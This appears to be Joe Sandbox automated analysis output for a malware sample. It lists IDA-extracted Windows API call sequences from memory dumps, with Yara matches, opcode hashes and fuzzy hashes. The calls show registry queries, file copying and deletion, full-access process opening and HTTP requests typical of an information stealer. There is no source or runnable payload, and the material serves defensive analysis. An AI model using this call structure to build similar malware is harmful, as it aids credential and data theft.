                                                    • Part of subcall function 00B3AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B3AAEC
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                  • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 00B358AB
                                                  • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 00B35908
                                                  • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 00B35ABE
                                                    • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                    • Part of subcall function 00B35457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 00B3548F
                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                    • Part of subcall function 00B35527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 00B3557F
                                                    • Part of subcall function 00B35527: lstrlen.KERNEL32(00000000), ref: 00B35596
                                                    • Part of subcall function 00B35527: StrStrA.SHLWAPI(00000000,00000000), ref: 00B355CB
                                                    • Part of subcall function 00B35527: lstrlen.KERNEL32(00000000), ref: 00B355EA
                                                    • Part of subcall function 00B35527: strtok.MSVCRT(00000000,?), ref: 00B35605
                                                    • Part of subcall function 00B35527: lstrlen.KERNEL32(00000000), ref: 00B35615
                                                  • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 00B359F2
                                                  • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 00B35BA7
                                                  • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 00B35C73
                                                  • Sleep.KERNEL32(0000EA60), ref: 00B35C82
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpylstrlen$Sleepstrtok
                                                  • String ID:
                                                  • API String ID: 3630751533-0
                                                  • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                  • Instruction ID: 0b075c65eb3a11c38c68679c85202f9917a4fe8ac32e83bc35c3743da5d5b434
                                                  • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                  • Instruction Fuzzy Hash: 76E15772900204ABCB18FBB0DD96DED73B9AF66701F7085ACB44666191EF346F48CB52
                                                  APIs
                                                  • memset.MSVCRT ref: 00B2158E
                                                    • Part of subcall function 00B21507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B2151B
                                                    • Part of subcall function 00B21507: RtlAllocateHeap.NTDLL(00000000), ref: 00B21522
                                                    • Part of subcall function 00B21507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00B2153E
                                                    • Part of subcall function 00B21507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00B2155C
                                                    • Part of subcall function 00B21507: RegCloseKey.ADVAPI32(?), ref: 00B21566
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B215B6
                                                  • lstrlen.KERNEL32(?), ref: 00B215C3
                                                  • lstrcat.KERNEL32(?,004262EC), ref: 00B215DE
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                    • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                    • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                    • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                    • Part of subcall function 00B38DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B21660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B38DED
                                                    • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                    • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00B216CC
                                                    • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                    • Part of subcall function 00B29C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B29C53
                                                    • Part of subcall function 00B29C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B29C78
                                                    • Part of subcall function 00B29C27: LocalAlloc.KERNEL32(00000040,?), ref: 00B29C98
                                                    • Part of subcall function 00B29C27: ReadFile.KERNEL32(000000FF,?,00000000,00B216F6,00000000), ref: 00B29CC1
                                                    • Part of subcall function 00B29C27: LocalFree.KERNEL32(00B216F6), ref: 00B29CF7
                                                    • Part of subcall function 00B29C27: CloseHandle.KERNEL32(000000FF), ref: 00B29D01
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00B21756
                                                  • memset.MSVCRT ref: 00B2177D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                  • String ID:
                                                  • API String ID: 3885987321-0
                                                  • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                  • Instruction ID: 1fd90f10a2ae4b3b424127d46309a48dafbef2f9e0c9558077e97aebc3f82c7a
                                                  • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                  • Instruction Fuzzy Hash: 685151B2940218ABCB15FB60DD92EED73BCEF55700F6041E8B64A62091EE305B89CF56
                                                  APIs
                                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                  • wsprintfA.USER32 ref: 00418459
                                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  • RegQueryValueExA.ADVAPI32(00000000,0086A500,00000000,000F003F,?,00000400), ref: 004184EC
                                                  • lstrlenA.KERNEL32(?), ref: 00418501
                                                  • RegQueryValueExA.ADVAPI32(00000000,0086A6E0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                  • String ID: %s\%s
                                                  • API String ID: 3896182533-4073750446
                                                  • Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                                  • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                                  • Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                                  • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                                  APIs
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A51
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A68
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B24A7F
                                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B24AA0
                                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00B24AB0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$CrackInternetlstrlen
                                                  • String ID: <
                                                  • API String ID: 1683549937-4251816714
                                                  • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                  • Instruction ID: 5187fc8eaa553716601274e31fa58b587f700f9cb71d89d3c72375ae472e6b16
                                                  • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                  • Instruction Fuzzy Hash: AD215BB5D00219ABDF10EFA4E849AED7BB4FF05321F108225F965A72D0EB706A05CF91
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                                  • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                                  • RegOpenKeyExA.ADVAPI32(80000002,00837898,00000000,00020119,00000000), ref: 004176DD
                                                  • RegQueryValueExA.ADVAPI32(00000000,0086A4E8,00000000,00000000,?,000000FF), ref: 004176FE
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                  • String ID: Windows 11
                                                  • API String ID: 3466090806-2517555085
                                                  • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                  • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                                  • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                  • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B3790B
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B37912
                                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 00B37944
                                                  • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 00B37965
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B3796F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                  • String ID: Windows 11
                                                  • API String ID: 3225020163-2517555085
                                                  • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                  • Instruction ID: 4c24ff272e2303af86a5c3289b201837adc38b684d17126928c3ed912d1c0aa9
                                                  • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                  • Instruction Fuzzy Hash: 2F012CBDA84208BBEB10DBE0DD49FADB7B9EB48701F105294FA05A6281DA7499008B51
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                                  • RegOpenKeyExA.ADVAPI32(80000002,00837898,00000000,00020119,004176B9), ref: 0041775B
                                                  • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                                  • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                  • String ID: CurrentBuildNumber
                                                  • API String ID: 3466090806-1022791448
                                                  • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                  • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                                  • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                  • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                                  APIs
                                                  • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                                  • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                                  • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleSize
                                                  • String ID: :A$:A
                                                  • API String ID: 1378416451-1974578005
                                                  • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                  • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                                  • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                  • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B275A1
                                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B27618
                                                  • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 00B27674
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B276B9
                                                  • HeapFree.KERNEL32(00000000), ref: 00B276C0
                                                    • Part of subcall function 00B294A7: vsprintf_s.MSVCRT ref: 00B294C2
                                                  • task.LIBCPMTD ref: 00B277BC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                                  • String ID:
                                                  • API String ID: 700816787-0
                                                  • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                  • Instruction ID: c239a29516c48e6a5a7e722e29fb695a110170696b88fb0cc96802c9b4aa1055
                                                  • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                  • Instruction Fuzzy Hash: 526106B59442689BDB24DB50DC95FE9B7B8BF48300F0081E9E649A6241DFB06AC5CF94
                                                  APIs
                                                    • Part of subcall function 00B3AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B3AA4D
                                                    • Part of subcall function 00B264E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 00B26548
                                                    • Part of subcall function 00B264E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 00B2656A
                                                    • Part of subcall function 00B264E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B2659C
                                                    • Part of subcall function 00B264E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B265EC
                                                    • Part of subcall function 00B264E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B26626
                                                    • Part of subcall function 00B264E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B26638
                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                  • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 00B3557F
                                                  • lstrlen.KERNEL32(00000000), ref: 00B35596
                                                    • Part of subcall function 00B39097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B390B9
                                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00B355CB
                                                  • lstrlen.KERNEL32(00000000), ref: 00B355EA
                                                  • strtok.MSVCRT(00000000,?), ref: 00B35605
                                                  • lstrlen.KERNEL32(00000000), ref: 00B35615
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                  • String ID:
                                                  • API String ID: 3532888709-0
                                                  • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                  • Instruction ID: 3893341b45124a69be38c8d97f904a8a1e8707fbb4da29029964e0462dd9d372
                                                  • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                  • Instruction Fuzzy Hash: F0512C71510208EBCB18FF64DE92EED77B5AF21701FB04198F44A665A1DB346B05CB52
                                                  APIs
                                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 00B37345
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,00B37574,004205BD), ref: 00B37383
                                                  • memset.MSVCRT ref: 00B373D1
                                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00B37525
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: OpenProcesslstrcpymemset
                                                  • String ID:
                                                  • API String ID: 224852652-0
                                                  • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                  • Instruction ID: 565a4e276bfbe93330fc9b7de39f67b1b0ae380c27d524dc796f14cb51b8a2a2
                                                  • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                  • Instruction Fuzzy Hash: 38518EF1D442189BDB24EBA0DC85BEDB7B4EF54305F2081E8E109A6281DF746A88CF59
                                                  APIs
                                                  • memset.MSVCRT ref: 004140D5
                                                  • RegOpenKeyExA.ADVAPI32(80000001,0086AF78,00000000,00020119,?), ref: 004140F4
                                                  • RegQueryValueExA.ADVAPI32(?,0086B958,00000000,00000000,00000000,000000FF), ref: 00414118
                                                  • RegCloseKey.ADVAPI32(?), ref: 00414122
                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                                  • lstrcatA.KERNEL32(?,0086B7D8), ref: 0041415B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                                  • String ID:
                                                  • API String ID: 2623679115-0
                                                  • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                  • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                                  • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                                  • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                                  APIs
                                                  • memset.MSVCRT ref: 00B3433C
                                                  • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 00B3435B
                                                  • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 00B3437F
                                                  • RegCloseKey.ADVAPI32(?), ref: 00B34389
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B343AE
                                                  • lstrcat.KERNEL32(?,0064A168), ref: 00B343C2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                                  • String ID:
                                                  • API String ID: 2623679115-0
                                                  • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                  • Instruction ID: e746a75b4e4d69ed586bd8d640fcd182d52f79de1d8e95f81203994a3b6d5dcc
                                                  • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                  • Instruction Fuzzy Hash: 804189B69401087BDB14FBE0DC46FEE777DAB99300F00459CB61957181EA756B888BE2
                                                  APIs
                                                  • strtok_s.MSVCRT ref: 00413588
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • strtok_s.MSVCRT ref: 004136D1
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00867190,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpystrtok_s$lstrlen
                                                  • String ID:
                                                  • API String ID: 3184129880-0
                                                  • Opcode ID: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                  • Instruction ID: 1d6e97e2126c91d023f3aa3275f065f217875d3b7f18f669bcfd2096c4fc0c60
                                                  • Opcode Fuzzy Hash: 64ab5e27dc640e177239ea1b756d4cc1ada2d3f0f35c5ecd3cd97600b2ebe9e7
                                                  • Instruction Fuzzy Hash: C34191B1D00108EFCB04EFE5D945AEEB7B4BF44308F00801EE41676291DB789A56CFAA
                                                  APIs
                                                  • __lock.LIBCMT ref: 0041B39A
                                                    • Part of subcall function 0041AFAC: __mtinitlocknum.LIBCMT ref: 0041AFC2
                                                    • Part of subcall function 0041AFAC: __amsg_exit.LIBCMT ref: 0041AFCE
                                                    • Part of subcall function 0041AFAC: EnterCriticalSection.KERNEL32(?,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041AFD6
                                                  • DecodePointer.KERNEL32(0042A138,00000020,0041B4DD,?,00000001,00000000,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E), ref: 0041B3D6
                                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B3E7
                                                    • Part of subcall function 0041BE35: EncodePointer.KERNEL32(00000000,0041C063,004495B8,00000314,00000000,?,?,?,?,?,0041B707,004495B8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041BE37
                                                  • DecodePointer.KERNEL32(-00000004,?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B40D
                                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B420
                                                  • DecodePointer.KERNEL32(?,0041B4FF,000000FF,?,0041AFD3,00000011,?,?,0041AC60,0000000E,0042A0F8,0000000C,0041AC2A), ref: 0041B42A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
